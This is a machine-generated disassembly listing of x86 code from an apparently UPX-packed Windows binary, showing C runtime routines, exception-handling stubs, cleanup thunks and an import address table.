; sub_422B72+18B�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_421AC1
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_422D1D
loc_422D19: ; CODE XREF: sub_422B72+137�j
; sub_422B72+15F�j ...
mov byte ptr [ebx], 0Dh
loc_422D1C: ; CODE XREF: sub_422B72+180�j
; sub_422B72+190�j
inc ebx
loc_422D1D: ; CODE XREF: sub_422B72+11A�j
; sub_422B72+1A5�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_422C75
jmp short loc_422D3B
; ---------------------------------------------------------------------------
loc_422D2B: ; CODE XREF: sub_422B72+10A�j
mov eax, [edi]
test byte ptr [eax+esi+4], 40h
jnz short loc_422D3B
lea esi, [eax+esi+4]
or byte ptr [esi], 2
loc_422D3B: ; CODE XREF: sub_422B72+FD�j
; sub_422B72+1B7�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_422D41: ; CODE XREF: sub_422B72+CA�j
mov eax, [ebp+var_8]
jmp short loc_422D48
; ---------------------------------------------------------------------------
loc_422D46: ; CODE XREF: sub_422B72+16�j
; sub_422B72+3E�j ...
xor eax, eax
loc_422D48: ; CODE XREF: sub_422B72+B8�j
; sub_422B72+1D2�j
pop edi
pop esi
pop ebx
leave
retn
sub_422B72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D4D proc near ; CODE XREF: sub_422605+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00422DDC SIZE 0000001C BYTES
push 0Ch
push offset stru_426128
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, ds:dword_47C62C
jnb short loc_422DDC
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_422DDC
push ebx
call sub_421F4C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_422DAC
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_422B72
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_422DC3
; ---------------------------------------------------------------------------
loc_422DAC: ; CODE XREF: sub_422D4D+49�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_422DC3: ; CODE XREF: sub_422D4D+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_422DD4
mov eax, [ebp+var_1C]
jmp short loc_422DF2
sub_422D4D endp
; =============== S U B R O U T I N E =======================================
sub_422DD1 proc near ; DATA XREF: UPX0:stru_426128�o
mov ebx, [ebp+8]
sub_422DD1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422DD4 proc near ; CODE XREF: sub_422D4D+7A�p
push ebx
call sub_421FEC
pop ecx
retn
sub_422DD4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422D4D
loc_422DDC: ; CODE XREF: sub_422D4D+15�j
; sub_422D4D+35�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_422DF2: ; CODE XREF: sub_422D4D+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_422D4D
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_422E5A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_422E1C: ; CODE XREF: UPX0:00422E49�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_422E4B
or al, al
jz short loc_422E4B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_422E38
cmp ah, bl
ja short loc_422E38
add ah, dh
loc_422E38: ; CODE XREF: UPX0:00422E30�j
; UPX0:00422E34�j
cmp al, bh
jb short loc_422E42
cmp al, bl
ja short loc_422E42
add al, dh
loc_422E42: ; CODE XREF: UPX0:00422E3A�j
; UPX0:00422E3E�j
cmp ah, al
jnz short loc_422E51
sub ecx, 1
jnz short loc_422E1C
loc_422E4B: ; CODE XREF: UPX0:00422E22�j
; UPX0:00422E26�j
xor ecx, ecx
cmp ah, al
jz short loc_422E5A
loc_422E51: ; CODE XREF: UPX0:00422E44�j
mov ecx, 0FFFFFFFFh
jb short loc_422E5A
neg ecx
loc_422E5A: ; CODE XREF: UPX0:00422E0B�j
; UPX0:00422E4F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_422E61 proc near ; CODE XREF: sub_422A31+73�p
; sub_422A31+CA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
lea edx, ds:47C640h[ecx*4]
lea ecx, [eax+eax*8]
mov eax, [edx]
shl ecx, 2
movzx eax, byte ptr [eax+ecx+4]
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_422E9D
mov edx, [edx]
lea ecx, [edx+ecx+4]
and byte ptr [ecx], 7Fh
jmp short loc_422EB0
; ---------------------------------------------------------------------------
loc_422E9D: ; CODE XREF: sub_422E61+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_422EBD
mov edx, [edx]
lea ecx, [edx+ecx+4]
or byte ptr [ecx], 80h
loc_422EB0: ; CODE XREF: sub_422E61+3A�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_422EBD: ; CODE XREF: sub_422E61+44�j
call sub_41E685
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_422E61 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422ECE proc near ; CODE XREF: sub_415CE0+242�p
jmp dword_424228
sub_422ECE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422ED4 proc near ; CODE XREF: sub_415CE0+1F7�p
jmp dword_424224
sub_422ED4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422EDA proc near ; CODE XREF: sub_415CE0+91�p
jmp dword_42422C
sub_422EDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422EE0 proc near ; CODE XREF: sub_4193B2+24�p
; sub_419758+13�p
jmp dword_424190
sub_422EE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422EE6 proc near ; CODE XREF: sub_417290+29�p
jmp dword_4240CC
sub_422EE6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_4023D0 proc near ; DATA XREF: sub_4023D0+5�o
mov eax, offset dword_4262BC
jmp sub_419404
SEH_4023D0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_418F90
; =============== S U B R O U T I N E =======================================
SEH_4027A0 proc near ; DATA XREF: sub_4027A0+2�o
mov eax, offset dword_4262E0
jmp sub_419404
SEH_4027A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_403950 proc near ; DATA XREF: sub_403950+5�o
mov eax, offset dword_426330
jmp sub_419404
SEH_403950 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-120h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-114h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_404800 proc near ; DATA XREF: sub_404800+2�o
mov eax, offset dword_42635C
jmp sub_419404
SEH_404800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_405390 proc near ; DATA XREF: sub_405390+5�o
mov eax, offset dword_4263AC
jmp sub_419404
SEH_405390 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_408EB0
; ---------------------------------------------------------------------------
loc_422F7B: ; DATA XREF: UPX0:004263D4�o
mov ecx, [ebp-10h]
add ecx, 30h
jmp nullsub_1
; =============== S U B R O U T I N E =======================================
SEH_406B60 proc near ; DATA XREF: sub_406B60+2�o
mov eax, offset dword_4263D8
jmp sub_419404
SEH_406B60 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_408EB0
; =============== S U B R O U T I N E =======================================
SEH_406C20 proc near ; DATA XREF: sub_406C20+2�o
mov eax, offset dword_4263FC
jmp sub_419404
SEH_406C20 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-320h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_407140 proc near ; DATA XREF: sub_407140+8�o
mov eax, offset dword_426454
jmp sub_419404
SEH_407140 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-114h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_4085A0 proc near ; DATA XREF: sub_4085A0+2�o
mov eax, offset dword_4264CC
jmp sub_419404
SEH_4085A0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 2804h
jmp sub_407F30
; ---------------------------------------------------------------------------
loc_422FFE: ; DATA XREF: UPX0:004264F4�o
mov ecx, [ebp-10h]
add ecx, 2810h
jmp sub_4083A0
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 283Ch
jmp sub_408740
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 285Ch
jmp sub_408740
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 287Ch
jmp sub_408740
; =============== S U B R O U T I N E =======================================
SEH_408900 proc near ; DATA XREF: sub_408900+2�o
mov eax, offset dword_426510
jmp sub_419404
SEH_408900 endp
; ---------------------------------------------------------------------------
mov eax, [ebp+4]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_408A20 proc near ; DATA XREF: sub_408A20+8�o
mov eax, offset dword_426534
jmp sub_419404
SEH_408A20 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
jmp sub_418F90
; ---------------------------------------------------------------------------
loc_423068: ; DATA XREF: UPX0:0042655C�o
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_423073: ; DATA XREF: UPX0:00426564�o
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42307E: ; DATA XREF: UPX0:0042656C�o
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_408B20 proc near ; DATA XREF: sub_408B20+2�o
mov eax, offset dword_426570
jmp sub_419404
SEH_408B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_408C40 proc near ; DATA XREF: sub_408C40+5�o
mov eax, offset dword_4265F4
jmp sub_419404
SEH_408C40 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_418F90
; =============== S U B R O U T I N E =======================================
SEH_408ED0 proc near ; DATA XREF: sub_408ED0+2�o
mov eax, offset dword_426618
jmp sub_419404
SEH_408ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_409710 proc near ; DATA XREF: sub_409710+5�o
mov eax, offset dword_426668
jmp sub_419404
SEH_409710 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp+4]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_409BA0 proc near ; DATA XREF: sub_409BA0+8�o
mov eax, offset dword_42668C
jmp sub_419404
SEH_409BA0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-114h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_409C50 proc near ; DATA XREF: sub_409C50+2�o
mov eax, offset dword_4266B0
jmp sub_419404
SEH_409C50 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-348h]
jmp sub_408EB0
; =============== S U B R O U T I N E =======================================
SEH_409E30 proc near ; DATA XREF: sub_409E30+5�o
mov eax, offset dword_426708
jmp sub_419404
SEH_409E30 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_418F90
; ---------------------------------------------------------------------------
loc_423148: ; DATA XREF: UPX0:00426730�o
mov eax, [ebp+4]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_40AA90 proc near ; DATA XREF: sub_40AA90+2�o
mov eax, offset dword_426734
jmp sub_419404
SEH_40AA90 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_418F90
; =============== S U B R O U T I N E =======================================
SEH_40AB20 proc near ; DATA XREF: sub_40AB20+2�o
mov eax, offset dword_426758
jmp sub_419404
SEH_40AB20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_40ABB0 proc near ; DATA XREF: sub_40ABB0+5�o
mov eax, offset dword_4267A8
jmp sub_419404
SEH_40ABB0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_40C480 proc near ; DATA XREF: sub_40C480+2�o
mov eax, offset dword_426824
jmp sub_419404
SEH_40C480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423220 proc near ; DATA XREF: UPX0:00426854�o
mov eax, [ebp-18h]
push eax
call sub_41930D
pop ecx
retn
sub_423220 endp
; =============== S U B R O U T I N E =======================================
SEH_40C7C0 proc near ; DATA XREF: sub_40C7C0+5�o
mov eax, offset dword_426884
jmp sub_419404
SEH_40C7C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_40C950 proc near ; DATA XREF: sub_40C950+5�o
mov eax, offset dword_4268D4
jmp sub_419404
SEH_40C950 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423250 proc near ; DATA XREF: UPX0:004268FC�o
lea ecx, [ebp-1F4h]
jmp sub_40CBE0
sub_423250 endp
; =============== S U B R O U T I N E =======================================
SEH_40CCF0 proc near ; DATA XREF: sub_40CCF0+5�o
mov eax, offset dword_42692C
jmp sub_419404
SEH_40CCF0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-10h]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_40F3B0 proc near ; DATA XREF: sub_40F2E0+8�o
; sub_40F3B0+8�o
mov eax, offset dword_426950
jmp sub_419404
SEH_40F3B0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp+4]
push eax
call sub_41930D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_4106A0 proc near ; DATA XREF: sub_40F480+8�o
; sub_40F540+8�o ...
mov eax, offset dword_426974
jmp sub_419404
SEH_4106A0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-120h]
jmp sub_410B90
; =============== S U B R O U T I N E =======================================
SEH_410DB0 proc near ; DATA XREF: sub_410DB0+2�o
mov eax, offset dword_426998
jmp sub_419404
SEH_410DB0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-11Ch]
jmp sub_408EB0
; =============== S U B R O U T I N E =======================================
SEH_410F70 proc near ; DATA XREF: sub_410F70+8�o
mov eax, offset dword_4269BC
jmp sub_419404
SEH_410F70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4232F0 proc near ; DATA XREF: UPX0:004269E4�o
mov eax, [ebp-14h]
push eax
call sub_41930D
pop ecx
retn
sub_4232F0 endp
; =============== S U B R O U T I N E =======================================
SEH_4110E0 proc near ; DATA XREF: sub_4110E0+5�o
mov eax, offset dword_426A14
jmp sub_419404
SEH_4110E0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-28ECh]
jmp sub_408900
; =============== S U B R O U T I N E =======================================
SEH_411360 proc near ; DATA XREF: sub_411360+2�o
mov eax, offset dword_426A38
jmp sub_419404
SEH_411360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_411DE0 proc near ; DATA XREF: sub_411DE0+5�o
mov eax, offset dword_426A88
jmp sub_419404
SEH_411DE0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-444h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_42334B: ; DATA XREF: UPX0:00426AB0�o
lea ecx, [ebp-434h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-424h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_412860 proc near ; DATA XREF: sub_412860+2�o
mov eax, offset dword_426ABC
jmp sub_419404
SEH_412860 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-820h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_412CA0 proc near ; DATA XREF: sub_412CA0+2�o
mov eax, offset dword_426AE0
jmp sub_419404
SEH_412CA0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-820h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_42339B: ; DATA XREF: UPX0:00426B08�o
lea ecx, [ebp-830h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_4130B0 proc near ; DATA XREF: sub_4130B0+2�o
mov eax, offset dword_426B0C
jmp sub_419404
SEH_4130B0 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A4h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_4233BB: ; DATA XREF: UPX0:00426B34�o
lea ecx, [ebp-98h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-7Ch]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-88h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-60h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-70h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_413410 proc near ; DATA XREF: sub_413410+2�o
mov eax, offset dword_426B58
jmp sub_419404
SEH_413410 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-820h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_413B10 proc near ; DATA XREF: sub_413B10+2�o
mov eax, offset dword_426B7C
jmp sub_419404
SEH_413B10 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-30h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_423428: ; DATA XREF: UPX0:00426BA4�o
lea ecx, [ebp-18h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_414370 proc near ; DATA XREF: sub_414370+2�o
mov eax, offset dword_426BB0
jmp sub_419404
SEH_414370 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-21B8h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_42345B: ; DATA XREF: UPX0:00426BD8�o
lea ecx, [ebp-2178h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-2148h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-2160h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-2154h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-216Ch]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-2184h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-21D4h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-2194h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
lea ecx, [ebp-21C4h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_414690 proc near ; DATA XREF: sub_414690+2�o
mov eax, offset dword_426C1C
jmp sub_419404
SEH_414690 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-24h]
jmp loc_411FF0
; ---------------------------------------------------------------------------
loc_4234D8: ; DATA XREF: UPX0:00426C44�o
lea ecx, [ebp-18h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_415460 proc near ; DATA XREF: sub_415460+2�o
mov eax, offset dword_426C48
jmp sub_419404
SEH_415460 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-174h]
jmp loc_411FF0
; =============== S U B R O U T I N E =======================================
SEH_415AE0 proc near ; DATA XREF: sub_415AE0+2�o
mov eax, offset dword_426C6C
jmp sub_419404
SEH_415AE0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 0Ch
jmp sub_4190E0
; =============== S U B R O U T I N E =======================================
SEH_418F90 proc near ; DATA XREF: sub_418F90+2�o
mov eax, offset dword_426C90
jmp sub_419404
SEH_418F90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423530 proc near ; DATA XREF: UPX0:00428008�o
push 80h
push offset loc_428778
mov ecx, offset off_42AE60
call sub_406B60
push offset loc_4235D0
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
loc_423550: ; DATA XREF: UPX0:0042800C�o
push offset sub_4235E0
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_423560: ; DATA XREF: UPX0:00428010�o
push offset sub_423600
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_423570: ; DATA XREF: UPX0:00428014�o
push offset sub_423620
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_423580: ; DATA XREF: UPX0:00428018�o
push offset sub_423640
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_423590: ; DATA XREF: UPX0:0042801C�o
push offset sub_423660
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4235A0: ; DATA XREF: UPX0:00428020�o
push offset sub_423680
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4235B0: ; DATA XREF: UPX0:00428024�o
push offset sub_4236A0
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4235C0: ; DATA XREF: UPX0:00428028�o
push offset sub_4236C0
call sub_41A2A1
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4235D0: ; DATA XREF: sub_423530+14�o
mov ecx, offset off_42AE60
jmp sub_406C20
sub_423530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4235E0 proc near ; DATA XREF: sub_423530:loc_423550�o
mov eax, dword_430530
test eax, eax
jz short locret_4235F0
push eax
call sub_41930D
pop ecx
locret_4235F0: ; CODE XREF: sub_4235E0+7�j
retn
sub_4235E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423600 proc near ; DATA XREF: sub_423530:loc_423560�o
mov eax, dword_4304F4
test eax, eax
jz short locret_423610
push eax
call sub_41930D
pop ecx
locret_423610: ; CODE XREF: sub_423600+7�j
retn
sub_423600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423620 proc near ; DATA XREF: sub_423530:loc_423570�o
mov eax, dword_430500
test eax, eax
jz short locret_423630
push eax
call sub_41930D
pop ecx
locret_423630: ; CODE XREF: sub_423620+7�j
retn
sub_423620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423640 proc near ; DATA XREF: sub_423530:loc_423580�o
mov eax, dword_43053C
test eax, eax
jz short locret_423650
push eax
call sub_41930D
pop ecx
locret_423650: ; CODE XREF: sub_423640+7�j
retn
sub_423640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423660 proc near ; DATA XREF: sub_423530:loc_423590�o
mov eax, dword_43050C
test eax, eax
jz short locret_423670
push eax
call sub_41930D
pop ecx
locret_423670: ; CODE XREF: sub_423660+7�j
retn
sub_423660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423680 proc near ; DATA XREF: sub_423530:loc_4235A0�o
mov eax, dword_430524
test eax, eax
jz short locret_423690
push eax
call sub_41930D
pop ecx
locret_423690: ; CODE XREF: sub_423680+7�j
retn
sub_423680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4236A0 proc near ; DATA XREF: sub_423530:loc_4235B0�o
mov eax, dword_430518
test eax, eax
jz short locret_4236B0
push eax
call sub_41930D
pop ecx
locret_4236B0: ; CODE XREF: sub_4236A0+7�j
retn
sub_4236A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4236C0 proc near ; DATA XREF: sub_423530:loc_4235C0�o
mov eax, dword_430AC8
test eax, eax
push esi
mov esi, eax
jz short loc_4236E7
mov eax, [eax+4]
push eax
call sub_41930D
mov ecx, [esi+8]
push ecx
call sub_41930D
push esi
call sub_41930D
add esp, 0Ch
loc_4236E7: ; CODE XREF: sub_4236C0+A�j
pop esi
retn
sub_4236C0 endp
; ---------------------------------------------------------------------------
loc_4236E9: ; DATA XREF: sub_419224+31�o
mov ecx, offset dword_44BEA0
jmp sub_4191E5
; ---------------------------------------------------------------------------
align 4
dd 243h dup(0)
dword_424000 dd 77DD7F3Eh ; DATA XREF: sub_4067D0+132�r
; sub_4067D0+1AD�r
dword_424004 dd 77DD590Bh ; DATA XREF: sub_406670+1D�r
; sub_406730+19�r ...
dword_424008 dd 77DD189Ah ; DATA XREF: sub_4062A0+2ED�r
; sub_40A2D0+348�r ...
dword_42400C dd 77DD59F0h ; DATA XREF: sub_4061E0+7D�r
; sub_4062A0+197�r ...
dword_424010 dd 77DD22EAh ; DATA XREF: sub_405FB0+1CC�r
; sub_4061E0+50�r ...
dword_424014 dd 77DD23D7h ; DATA XREF: sub_405FB0+1F7�r
; sub_4062A0+87�r ...
dword_424018 dd 77DDAE23h ; DATA XREF: sub_4067D0+E8�r
align 10h
dword_424020 dd 77E79908h ; DATA XREF: sub_421D75+4�r
dword_424024 dd 77E78C81h ; DATA XREF: sub_421AC1+2D�r
; sub_422246+3C�r
dword_424028 dd 77E7176Ch ; DATA XREF: sub_42153A+8�r
dword_42402C dd 77E7339Ch ; DATA XREF: sub_421502+C�r
dword_424030 dd 77E6C703h ; DATA XREF: sub_421394+35�r
dword_424034 dd 77E7A13Fh ; DATA XREF: sub_421394+4C�r
dword_424038 dd 77E7C866h ; DATA XREF: sub_420DD8+24�r
; sub_420DD8+128�r
dword_42403C dd 77E641EBh ; DATA XREF: sub_420DD8+19C�r
dword_424040 dd 77E7513Ch ; DATA XREF: sub_4218B5+20�r
dword_424044 dd 77E7849Fh ; DATA XREF: sub_421078+1C�r
; sub_421204+3A�r ...
dword_424048 dd 77E775F1h ; DATA XREF: sub_420778+131�r
; sub_420778+196�r ...
dword_42404C dd 77E78406h ; DATA XREF: sub_4202A3+107�r
; sub_4202A3+196�r ...
dword_424050 dd 77E7C931h ; DATA XREF: sub_4202A3+1EE�r
dword_424054 dd 77E77EE1h ; DATA XREF: sub_420181+B�r
dword_424058 dd 77E7C9E1h ; DATA XREF: sub_420181+C1�r
dword_42405C dd 77E67702h ; DATA XREF: sub_420181:loc_420258�r
dword_424060 dd 77E9C5B1h ; DATA XREF: sub_420181+113�r
dword_424064 dd 77EB9A84h ; DATA XREF: sub_41FCEB+159�r
dword_424068 dd 77E75CEBh ; DATA XREF: sub_401D10+F�r
; sub_404730+29�r ...
dword_42406C dd 77E77963h ; DATA XREF: sub_401EB0+C4�r
; sub_4030C0+2D5�r ...
dword_424070 dd 77E78B82h ; DATA XREF: sub_401EB0+6A�r
; sub_401EB0+B5�r ...
dword_424074 dd 77E7A837h ; DATA XREF: sub_401EB0+36�r
; sub_4030C0+23B�r ...
